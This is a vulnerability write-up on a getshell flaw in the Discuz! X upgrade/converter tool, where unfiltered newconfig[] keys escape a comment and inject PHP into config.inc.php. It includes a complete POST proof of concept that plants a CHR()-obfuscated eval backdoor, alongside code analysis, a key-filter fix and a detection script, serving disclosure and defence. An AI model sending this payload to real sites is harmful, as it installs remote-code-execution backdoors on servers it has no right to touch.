Discuz! X upgrade/converter getshell vulnerability: /convert/include/global.func.php lets special characters be injected into /convert/data/config.inc.php

Source: Internet
Author: User



Contents

1. Vulnerability description
2. Vulnerability trigger conditions
3. Scope of the vulnerability
4. Vulnerability code analysis
5. Defense methods
6. Attack and defense thinking





1. Vulnerability description

For a PHP application that generates code from user input, the boundary between data and code has to be delimited correctly. An attacker exploits a missing boundary by injecting a delimiter (its exact form depends on the context) into the input, so that the target treats the remainder of the input as code and executes it.

The root cause of this vulnerability is that a newline (the delimiter) can be placed inside a generated code comment (the input data). The newline ends the comment, and everything after it in the attacker's input is written into config.inc.php as executable PHP.



Relevant links:

http://p2j.cn/?p=357
http://loudong.360.cn/blog/view/id/15
http://www.2cto.com/Article/201402/278766.html
http://drops.wooyun.org/papers/929



2. Vulnerability trigger conditions

1. /convert/include/global.func.php does not filter the user-supplied array keys it writes into the configuration file (anything other than letters, digits and underscores should not be allowed in a key).
2. /convert/data/ is writable by the web server, so config.inc.php can be (re)written.


0x1: Manual exploitation

Open the converter's entry page:

http://localhost/discuz/utility/convert/index.php

Choose the conversion source (here source=d7.2_x2.0, an upgrade from Discuz! 7.2 to X2.0) to reach the settings form:

http://localhost/discuz/utility/convert/index.php?a=config&source=d7.2_x2.0

The "start settings" form takes the database connection properties for the source and target forums. The POSTed newconfig[] array is written directly into /convert/data/config.inc.php, so an attacker-controlled array key ends up inside the generated PHP file.



0x2: POC (automated test)

POST /DZ2/convert/ HTTP/1.1
Host: 192.168.52.129
Proxy-Connection: keep-alive
Content-Length: 925
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

a=config&source=d7.2_x2.0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw%5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3


Sending this request is enough to get a shell: the malicious code is written into /convert/data/config.inc.php. The injected key is aaa followed by two CRLF pairs and then eval(CHR(101).CHR(118)....CHR(59));//; the CHR() sequence decodes to eval("$_POST[c];");, a one-line backdoor that executes whatever PHP is sent in the POST parameter c. The string is assembled from CHR() calls rather than written literally because buildarray() passes the key through strtoupper() before writing the comment line (see section 4), which would otherwise corrupt a literal payload.




3. Scope of the vulnerability

All Discuz! X versions that ship the upgrade/converter tool.




4. Vulnerability code analysis



\discuz\utility\convert\index.php






\discuz\utility\convert\include\do_config.inc.php






\discuz\utility\convert\include\global.func.php






Follow the call into getvars(); the function that serializes the posted $newconfig array into the PHP source of config.inc.php is buildarray():





function buildarray($array, $level = 0, $pre = '$_config')
{
    static $ks;
    if($level == 0)
    {
        $ks = array();
        $return = '';
    }

    foreach ($array as $key => $val)
    {
        if($level == 0)
        {
            $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
            /*
            This is the line that creates the vulnerability:
            1. Discuz!'s intention is to use the key of the $config array as the "comment title" of each configuration section.
            2. $newline, which is written into the configuration file, is derived from $key, and $key is attacker-controlled.
            3. No boundary handling is done on the input, so the attacker can put a delimiter into the key, escape the // comment and turn the rest of the key into executable code:
                1) a line break (\r or \n)
                2) ?>
            Either delimiter gives the same effect.
            */
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."['$key']";
        if(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."['$key']";
            $return .= buildarray($val, $level + 1, $pre);
        }
        else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
        }
    }
    return $return;
}



5. Defense methods


function buildarray($array, $level = 0, $pre = '$_config')
{
    static $ks;
    if($level == 0)
    {
        $ks = array();
        $return = '';
    }

    foreach ($array as $key => $val)
    {
        // Strip every character other than letters, digits and underscores from $key
        $key = preg_replace("/[^\w]/", "", $key);

        if($level == 0)
        {
            $newline = str_pad(' CONFIG '.strtoupper($key).' ', 50, '-', STR_PAD_BOTH);
            $return .= "\r\n// $newline //\r\n";
        }

        $ks[$level] = $ks[$level - 1]."['$key']";
        if(is_array($val))
        {
            $ks[$level] = $ks[$level - 1]."['$key']";
            $return .= buildarray($val, $level + 1, $pre);
        }
        else
        {
            $val = !is_array($val) && (!preg_match("/^\-?[1-9]\d*$/", $val) || strlen($val) > 12) ? '\''.addcslashes($val, '\'\\').'\'' : $val;
            $return .= $pre.$ks[$level - 1]."['$key']"." = $val;\r\n";
        }
    }
    return $return;
}
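The following is an added example, not Discuz!'s own code, written to make sections 4 and 5 concrete. It reimplements the buildarray() logic compactly (the nesting prefix is passed down as $path instead of the original static $ks array), adds a switch that turns the section 5 key filter on or off, feeds both variants the page's POC key, and then tokenizes the generated config.inc.php source with token_get_all() to flag anything that is not a comment, whitespace or a literal assignment into $_config. The newconfig array is constructed sample input in the shape of the POC request; the function names are mine.

```php
<?php
// Added example, not Discuz!'s own code: a compact reimplementation of the
// buildarray() logic from sections 4 and 5, with a switch for the key filter,
// plus a token-level check of the generated config.inc.php source. The nesting
// prefix is passed down as $path instead of the original static $ks array.

function buildarray(array $array, bool $filterkeys, string $path = '', int $level = 0): string
{
    $return = '';
    foreach ($array as $key => $val) {
        $key = (string) $key;
        if ($filterkeys) {
            // Section 5 fix: keep only [A-Za-z0-9_] in the key.
            $key = preg_replace('/[^\w]/', '', $key);
        }
        if ($level == 0) {
            // Vulnerable line: $key is embedded verbatim in a // comment, so a
            // "\r\n" (or "?>") inside the key ends the comment. Note strtoupper():
            // whatever follows the newline is written upper-cased, which is why
            // the page's POC builds its string from CHR() calls.
            $newline = str_pad(' CONFIG ' . strtoupper($key) . ' ', 50, '-', STR_PAD_BOTH);
            $return .= "\r\n// $newline //\r\n";
        }
        $newpath = $path . "['$key']";
        if (is_array($val)) {
            $return .= buildarray($val, $filterkeys, $newpath, $level + 1);
        } else {
            $val = (string) $val;
            // Values are handled safely: non-numeric ones are single-quoted and escaped.
            $val = (!preg_match('/^\-?[1-9]\d*$/', $val) || strlen($val) > 12)
                ? '\'' . addcslashes($val, '\'\\') . '\''
                : $val;
            $return .= '$_config' . $newpath . " = $val;\r\n";
        }
    }
    return $return;
}

// Practitioner check: a file built this way should contain nothing but
// assignments of literals into $_config. Tokenize it and report every token
// that is not on that allow-list (T_EVAL, T_STRING for CHR(), T_CLOSE_TAG, ...).
function find_unexpected_tokens(string $src): array
{
    $allowed = [T_OPEN_TAG, T_WHITESPACE, T_COMMENT, T_VARIABLE,
                T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER];
    $allowedchars = ['[', ']', '=', ';', '-'];   // '-' for negative numbers
    $findings = [];
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowed, true)) {
                $findings[] = token_name($tok[0]) . ' "' . trim($tok[1]) . '" at line ' . $tok[2];
            }
        } elseif (!in_array($tok, $allowedchars, true)) {
            $findings[] = 'char "' . $tok . '"';
        }
    }
    return array_values(array_unique($findings));
}

// Constructed sample input in the shape of the POC's newconfig[] array. The
// first key is the page's payload; its CHR() sequence decodes to eval("$_POST[c];");
$payload = "aaa\r\n\r\neval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36)"
         . ".CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59)"
         . ".CHR(34).CHR(41).CHR(59));//";
$newconfig = [
    $payload => 'localhost',
    'source' => ['dbhost' => 'localhost', 'dbuser' => 'root', 'dbpw' => '', 'tablepre' => 'cdb_', 'pconnect' => '1'],
    'target' => ['dbhost' => 'localhost', 'dbuser' => 'root', 'dbname' => 'discuzx', 'tablepre' => 'pre_', 'pconnect' => '1'],
];

foreach (['vulnerable' => false, 'fixed' => true] as $label => $filter) {
    $src = "<?php\r\n" . buildarray($newconfig, $filter);
    $findings = find_unexpected_tokens($src);
    echo "=== $label buildarray() ===\n", $src, "\n";
    echo $findings ? "FLAGGED:\n  " . implode("\n  ", $findings) . "\n\n" : "clean\n\n";
}
```

Run it with the php command-line binary. The vulnerable pass prints a file in which the EVAL(CHR(...)) line sits outside any comment, and the token check lists T_EVAL and the CHR() call tokens; the fixed pass prints a file that consists only of comment lines and $_config[...] = literal; assignments and is reported clean. Two caveats on the section 5 fix: it normalizes hostile keys instead of rejecting the request, so the stricter option is to validate the posted keys against the fixed set of names the converter actually expects and refuse anything else; and because the converter is only needed while an upgrade is being performed, the utility/convert directory should be removed from the web root as soon as the upgrade is finished, which closes the writable /convert/data/ precondition as well.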



6. Attack and defense thinking



Copyright (c) Littlehann All rights reserved







